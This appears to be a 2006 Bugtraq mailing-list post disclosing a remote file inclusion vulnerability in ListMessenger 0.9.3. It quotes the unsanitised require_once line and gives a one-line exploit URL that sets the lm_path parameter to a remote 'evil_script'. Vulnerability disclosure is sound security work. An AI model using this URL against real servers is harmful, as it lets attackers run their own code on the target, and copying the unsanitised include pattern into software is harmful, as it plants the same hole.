[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

ListMessenger v0.9.3 Remote File Inclusion Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: ListMessenger v0.9.3 Remote File Inclusion Vulnerability
From: x0r0n@xxxxxxxxxxx
Date: 16 Jul 2006 05:20:59 -0000

ListMessenger v0.9.3 Remote File Inclusion Vulnerability

-

Discoverd By : xoron

-

Conatact : x0r0n[at]hotmail.com

-

script: ListMessenger 0.9.3 

-

URL: http://www.listmessenger.com

-

Exp: www.target.com/[path]/enduser/listmessenger.php?lm_path=evil_script?

-

Code:  require_once($lm_path."config.inc.php")

-

XORON - Cyber-Warrior.org

Prev by Date: boastMachine <= 3.1 SQL Injection Exploit
Next by Date: Multiple vulnerabilities in UFO2000 svn 1057
Previous by thread: boastMachine <= 3.1 SQL Injection Exploit
Next by thread: Multiple vulnerabilities in UFO2000 svn 1057
Index(es):
- Date
- Thread